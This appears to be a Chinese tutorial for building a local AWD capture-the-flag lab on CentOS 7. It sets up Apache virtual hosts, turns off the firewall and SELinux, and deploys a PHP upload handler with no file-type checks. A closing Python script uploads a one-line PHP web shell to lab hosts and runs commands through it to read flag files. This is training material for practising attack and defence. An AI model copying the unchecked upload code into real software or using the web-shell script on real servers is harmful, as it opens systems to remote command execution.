本地搭建awd环境与攻击测试(一)

本篇不用docker进行搭建,下一篇docker搭建

就利用上传漏洞进行演练,centos7下搭建

1.创建ctf用户:ctf1,ctf2,ctf3,ctf4

2.配置httpd文件

3.搭建php环境与upload.php

4.权限设置

5.python攻击脚本

一. 创建ctf用户:ctf1,ctf2,ctf3,ctf4

随机生成数:date +%s |sha256sum |base64 |head -c 10 ;echo
useradd ctf1 -p ctf1
cd /home/ctf1
mkdir www
echo "This is ctf1 index page" > /home/ctf1/www/index.html
chmod 755 /home/ctf1
chmod 755 /home/ctf1/www
chown ctf1:ctf1 /home/ctf1/www

useradd ctf2 -p ctf2
cd /home/ctf2
mkdir www
echo "This is ctf2 index page" > /home/ctf2/www/index.html
chmod 755 /home/ctf2
chmod 755 /home/ctf2/www
chown ctf2:ctf2 /home/ctf2/www


useradd ctf3 -p ctf3
cd /home/ctf3
mkdir www
echo "This is ctf3 index page" > /home/ctf3/www/index.html
chmod 755 /home/ctf3
chmod 755 /home/ctf3/www
chown ctf3:ctf3 /home/ctf3/www


useradd ctf4 -p ctf4
cd /home/ctf4
mkdir www
echo "This is ctf4 index page" > /home/ctf4/www/index.html
chmod 755 /home/ctf4
chmod 755 /home/ctf4/www
chown ctf4:ctf4 /home/ctf4/www

二. 配置httpd文件

vim  /etc/httpd/conf/httpd.conf
Listen 8081

<VirtualHost *:8081>
DocumentRoot "/home/ctf1/www"
#ServerName www.ibm.com #DNS
</VirtualHost>

<Directory "/home/ctf1/www">
Options Indexes FollowSymLinks
AllowOverride all
Require all granted
</Directory>

Listen 8082

<VirtualHost *:8082>
DocumentRoot "/home/ctf2/www"
#ServerName www.ibm.com #DNS
</VirtualHost>

<Directory "/home/ctf2/www">
Options Indexes FollowSymLinks
AllowOverride all
Require all granted
</Directory>

Listen 8083

<VirtualHost *:8083>
DocumentRoot "/home/ctf3/www"
#ServerName www.ibm.com #DNS
</VirtualHost>

<Directory "/home/ctf3/www">
Options Indexes FollowSymLinks
AllowOverride all
Require all granted
</Directory>


Listen 8084

<VirtualHost *:8084>
DocumentRoot "/home/ctf4/www"
#ServerName www.ibm.com #DNS
</VirtualHost>

<Directory "/home/ctf4/www">
Options Indexes FollowSymLinks
AllowOverride all
Require all granted
</Directory>

三. 搭建php环境与upload.php

关闭防火墙:
systemctl stop firewalld
setenforce 0
php环境安装
参考:https://www.cnblogs.com/shengChristine/p/9293996.html
yum -y install epel-release
rpm -Uvh https://mirror.webtatic.com/yum/el7/webtatic-release.rpm
yum install php70w php70w-fpm php70w-cli php70w-common php70w-devel php70w-gd php70w-pdo php70w-mysql php70w-mbstring php70w-bcmath
两个上传文件:
http://www.w3school.com.cn/php/php_file_upload.asp
upload.php
<html>
<body>
<form action="upload_file.php" method="post"
enctype="multipart/form-data">
<label for="file">Filename:</label>
<input type="file" name="file" id="file" />
<br />
<input type="submit" name="submit" value="Submit" />
</form>
</body>
</html>
upload_file.php
<?php
if ($_FILES["file"]["size"] < 20000)
  {
  if ($_FILES["file"]["error"] > 0)
    {
    echo "Return Code: " . $_FILES["file"]["error"] . "<br />";
    }
  else
    {
    echo "Upload: " . $_FILES["file"]["name"] . "<br />";
    echo "Type: " . $_FILES["file"]["type"] . "<br />";
    echo "Size: " . ($_FILES["file"]["size"] / 1024) . " Kb<br />";
    echo "Temp file: " . $_FILES["file"]["tmp_name"] . "<br />";
    if (file_exists("upload/" . $_FILES["file"]["name"]))
      {
      echo $_FILES["file"]["name"] . " already exists. ";
      }
    else
      {
      move_uploaded_file($_FILES["file"]["tmp_name"],
      "upload/" . $_FILES["file"]["name"]);
      echo "Stored in: " . "upload/" . $_FILES["file"]["name"];
      }
    }
  }
else
  {
  echo "Invalid file";
  }
?>

四. 权限设置

主要是upload的权限设置

upload目录创建:
mkdir /home/ctf1/www/upload
mkdir /home/ctf2/www/upload
mkdir /home/ctf3/www/upload
mkdir /home/ctf4/www/upload
用户文件夹属组设置(是apache用户,还是ctf用户,apache用户自行设置,此设置ctf用户):
chown -R ctf1:apache /home/ctf1
chown -R ctf2:apache /home/ctf2
chown -R ctf3:apache /home/ctf3
chown -R ctf4:apache /home/ctf4
upload文件夹权限设置:
chmod g+wx /home/ctf2/www/upload
chmod g+wx /home/ctf1/www/upload
chmod g+wx /home/ctf3/www/upload
chmod g+wx /home/ctf4/www/upload
根据情况设置(该文件夹下创建的文件都属于apache组)
chgrp apache /home/ctf1
chgrp apache /home/ctf2
chgrp apache /home/ctf3
chgrp apache /home/ctf4
创建flag
echo "this is flag1" >> /home/ctf1/flag
echo "this is flag2" >> /home/ctf2/flag
echo "this is flag3" >> /home/ctf3/flag
echo "this is flag4" >> /home/ctf4/flag

五. python攻击脚本

上传shell与执行命令

#coding=utf-8
"""
author:图先生
简介:http://www.youknowi.xin/
time:2019/6/22 8:40
filename:CTF_1.py
"""
import hackhttp
import requests
hh = hackhttp.hackhttp()
raw='''
POST /upload_file.php HTTP/1.1
Host: 192.168.159.128:808{}
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://192.168.159.128:8082/upload.php
Content-Type: multipart/form-data; boundary=---------------------------21093136245927
Content-Length: 336
Connection: close
Upgrade-Insecure-Requests: 1
-----------------------------21093136245927
Content-Disposition: form-data; name="file"; filename="shell.php"
Content-Type: application/octet-stream
<?php
@system($_GET["cmd"]);
-----------------------------21093136245927
Content-Disposition: form-data; name="submit"
Submit
-----------------------------21093136245927--
'''
#上传文件
url="http://192.168.159.128:808{}/upload_file.php"
for i in range(1,5):
    temp_raw=raw.format(str(i))
    #print(temp_raw)
    temp_url=url.format(str(i))
    code, head, html, redirect, log = hh.http(temp_url, raw=temp_raw)
    print(temp_url)
    print(code)
#cat flag
url="http://192.168.159.128:808{}/upload/shell.php?cmd=cat%20/home/ctf{}/flag"
for i in range(1,5):
    s=requests.get(url.format(str(i),str(i)))
    print(s.text)

2019.7.16